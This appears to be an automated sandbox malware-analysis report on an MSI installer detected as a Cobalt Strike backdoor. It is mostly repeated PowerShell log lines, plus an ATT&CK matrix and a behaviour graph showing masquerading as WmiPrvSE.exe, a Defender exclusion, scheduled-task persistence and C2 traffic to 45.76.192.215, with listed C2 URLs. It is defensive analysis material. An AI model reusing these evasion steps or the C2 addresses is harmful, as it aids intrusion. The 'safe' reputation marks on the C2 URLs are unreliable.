                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,FindCloseChangeNotification,23_2_00401630
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000887A0 GetLocalTime,4_2_000887A0
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00775E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,23_2_00775E28
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000616C0 GetVersionExW,GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,4_2_000616C0
                Source: C:\Users\Public\WmiPrvSE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 BlobJump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: WmiPrvSE.exe PID: 7928, type: MEMORYSTR
                Source: Yara matchFile source: 23.2.WmiPrvSE.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 23.2.WmiPrvSE.exe.1a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.WmiPrvSE.exe.760000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.WmiPrvSE.exe.760000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00776A78 socket,htons,ioctlsocket,closesocket,bind,listen,23_2_00776A78
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00776670 htonl,htons,socket,closesocket,bind,ioctlsocket,23_2_00776670
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0077EE8C socket,closesocket,htons,bind,listen,23_2_0077EE8C
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                2
                Valid Accounts
                1
                Native API
                1
                Scripting
                1
                Exploitation for Privilege Escalation
                12
                Disable or Modify Tools
                OS Credential Dumping1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomains1
                Replication Through Removable Media
                1
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory11
                Peripheral Device Discovery
                Remote Desktop ProtocolData from Removable Media2
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job
                2
                Valid Accounts
                2
                Valid Accounts
                3
                Obfuscated Files or Information
                Security Account Manager1
                Account Discovery
                SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Scheduled Task/Job
                21
                Access Token Manipulation
                11
                Software Packing
                NTDS4
                File and Directory Discovery
                Distributed Component Object ModelInput Capture1
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                Process Injection
                1
                DLL Side-Loading
                LSA Secrets37
                System Information Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Scheduled Task/Job
                1
                File Deletion
                Cached Domain Credentials341
                Security Software Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items132
                Masquerading
                DCSync121
                Virtualization/Sandbox Evasion
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Valid Accounts
                Proc Filesystem2
                Process Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Modify Registry
                /etc/passwd and /etc/shadow1
                Application Window Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron121
                Virtualization/Sandbox Evasion
                Network Sniffing1
                System Owner/User Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                Access Token Manipulation
                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task12
                Process Injection
                KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1487470 Sample: 1eSOBjseu2.msi Startdate: 04/08/2024 Architecture: WINDOWS Score: 100 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 Multi AV Scanner detection for submitted file 2->77 79 10 other signatures 2->79 9 msiexec.exe 85 42 2->9         started        12 msiexec.exe 4 2->12         started        process3 file4 63 C:\Windows\Installer\MSI44AA.tmp, PE32 9->63 dropped 65 C:\Windows\Installer\MSI40EF.tmp, PE32 9->65 dropped 67 C:\Windows\Installer\MSI40BF.tmp, PE32 9->67 dropped 69 4 other malicious files 9->69 dropped 14 aipackagechainer.exe 1 5 9->14         started        16 msiexec.exe 33 9->16         started        process5 file6 19 Desktop.exe 8 14->19         started        23 powershell.exe 2 33 14->23         started        55 C:\Users\user\...\aipackagechainer.exe, PE32 16->55 dropped 57 C:\Users\user\AppData\Roaming\...\Desktop.exe, PE32+ 16->57 dropped process7 file8 59 C:\Users\Public\WmiPrvSE.bat, ASCII 19->59 dropped 81 Multi AV Scanner detection for dropped file 19->81 25 cmd.exe 1 19->25         started        28 powershell.exe 11 23->28         started        30 powershell.exe 23->30         started        32 powershell.exe 23->32         started        34 2 other processes 23->34 signatures9 process10 signatures11 95 Uses schtasks.exe or at.exe to add and modify task schedules 25->95 97 Adds a directory exclusion to Windows Defender 25->97 36 WmiPrvSE.exe 25->36         started        40 certutil.exe 25->40         started        43 powershell.exe 6 23 25->43         started        53 3 other processes 25->53 45 conhost.exe 28->45         started        47 conhost.exe 30->47         started        49 conhost.exe 32->49         started        51 conhost.exe 34->51         started        process12 dnsIp13 71 45.76.192.215, 49709, 49710, 49713 AS-CHOOPAUS United States 36->71 83 Antivirus detection for dropped file 36->83 85 Multi AV Scanner detection for dropped file 36->85 87 Detected unpacking (creates a PE file in dynamic memory) 36->87 93 3 other signatures 36->93 61 C:\Users\Public\WmiPrvSE.exe, PE32+ 40->61 dropped 89 Drops PE files to the user root directory 40->89 91 Loading BitLocker PowerShell Module 43->91 file14 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                1eSOBjseu2.msi32%VirustotalBrowse
                1eSOBjseu2.msi42%ReversingLabsWin64.Backdoor.Cobeacon
                SourceDetectionScannerLabelLink
                C:\Users\Public\WmiPrvSE.exe100%AviraHEUR/AGEN.1344321
                C:\Users\Public\WmiPrvSE.exe100%Joe Sandbox ML
                C:\Users\Public\WmiPrvSE.exe88%ReversingLabsWin64.Trojan.CobaltStrike
                C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe47%ReversingLabsWin32.Trojan.CobaltStrike
                C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe0%ReversingLabs
                C:\Windows\Installer\MSI3FB2.tmp0%ReversingLabs
                C:\Windows\Installer\MSI4020.tmp0%ReversingLabs
                C:\Windows\Installer\MSI4060.tmp0%ReversingLabs
                C:\Windows\Installer\MSI4080.tmp0%ReversingLabs
                C:\Windows\Installer\MSI40BF.tmp0%ReversingLabs
                C:\Windows\Installer\MSI40EF.tmp0%ReversingLabs
                C:\Windows\Installer\MSI44AA.tmp0%ReversingLabs
                No Antivirus matches
                SourceDetectionScannerLabelLink
                bg.microsoft.map.fastly.net0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://contoso.com/License0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://45.76.192.215/xq0%Avira URL Cloudsafe
                https://45.76.192.215/pq0%Avira URL Cloudsafe
                http://crl.micro0%URL Reputationsafe
                https://45.76.192.215:59611/loadkFTJ0%Avira URL Cloudsafe
                https://45.76.192.215:59611/YF0%Avira URL Cloudsafe
                https://45.76.192.215:59611/loadMFvJ&0%Avira URL Cloudsafe
                https://45.76.192.215:59611/adGFxJ(0%Avira URL Cloudsafe
                https://45.76.192.215:59611/KX0J0%Avira URL Cloudsafe
                https://45.76.192.215:59611/ad0%Avira URL Cloudsafe
                https://45.76.192.215:59611/ad5F.J0%Avira URL Cloudsafe
                https://45.76.192.215:59611/load;F$J0%Avira URL Cloudsafe
                https://45.76.192.215:59611/loadYF0%Avira URL Cloudsafe
                https://45.76.192.215:59611/load5F.J0%Avira URL Cloudsafe
                https://45.76.192.215:59611//F0%Avira URL Cloudsafe
                https://45.76.192.215:59611/GFxJ(0%Avira URL Cloudsafe
                https://45.76.192.215:59611/loadGFxJ(0%Avira URL Cloudsafe
                https://45.76.192.215:59611/load0%Avira URL Cloudsafe
                45.76.192.2150%Avira URL Cloudsafe
                https://45.76.192.215:59611/load.215:59611/load0%Avira URL Cloudsafe
                https://45.76.192.215:59611/load0%VirustotalBrowse
                https://45.76.192.215:59611/load210%Avira URL Cloudsafe
                45.76.192.2151%VirustotalBrowse
                https://45.76.192.215:59611/qFbJ0%Avira URL Cloudsafe
                https://45.76.192.215:59611/90%Avira URL Cloudsafe
                https://45.76.192.215:59611/92.215:59611/sX(J0%Avira URL Cloudsafe
                https://45.76.192.215:59611/3X0%Avira URL Cloudsafe
                https://45.76.192.215:59611/loadnY0%Avira URL Cloudsafe
